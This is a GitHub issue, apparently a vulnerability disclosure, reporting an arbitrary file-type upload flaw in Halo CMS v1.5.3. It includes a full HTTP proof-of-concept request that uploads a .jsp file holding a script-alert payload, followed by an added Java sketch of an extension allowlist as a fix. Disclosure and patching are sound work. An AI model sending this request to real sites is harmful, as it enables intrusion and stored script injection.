Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload #1

Open
zongdeiqianxing opened this issue Jun 6, 2022 · 0 comments


zongdeiqianxing commented Jun 6, 2022

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp, html, etc.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--


permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code

@zongdeiqianxing zongdeiqianxing changed the title Halo cms v1.5.2 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload Jun 6, 2022
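
The missing check the report points at can be sketched as a server-side extension allowlist applied before an attachment is written. This is an added example, not Halo's code or a patch from the project; the class name `UploadNameCheck`, the method `safeStorageName` and the allowlist contents are assumptions chosen for illustration.

```java
import java.util.Locale;
import java.util.Optional;
import java.util.Set;
import java.util.UUID;

/** Hypothetical helper (not Halo code): allowlist check for uploaded attachment names. */
public class UploadNameCheck {

    // Assumed allowlist for illustration; a real deployment chooses its own.
    private static final Set<String> ALLOWED = Set.of("png", "jpg", "jpeg", "gif", "pdf", "txt");

    /** Returns a server-generated storage name, or empty if the upload must be rejected. */
    static Optional<String> safeStorageName(String clientFilename) {
        if (clientFilename == null || clientFilename.isBlank()) {
            return Optional.empty();
        }
        // Keep only the last path segment; the client never chooses the directory.
        String base = clientFilename.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        // The extension that decides how the file is handled is the final one.
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || dot == base.length() - 1) {
            return Optional.empty(); // no usable extension
        }
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) {
            return Optional.empty(); // jsp, html and anything else not listed
        }
        // Never reuse the client-supplied name on disk; keep only the vetted extension.
        return Optional.of(UUID.randomUUID() + "." + ext);
    }

    public static void main(String[] args) {
        // Constructed sample names; "2.jsp" is the filename from the request in the issue.
        String[] samples = {"2.jsp", "index.html", "photo.PNG", "notes.txt", "a.png.jsp", "archive"};
        for (String name : samples) {
            System.out.printf("%-12s -> %s%n", name, safeStorageName(name).orElse("REJECTED"));
        }
    }
}
```

Storing accepted files outside any directory the servlet container executes or serves as HTML complements the name check.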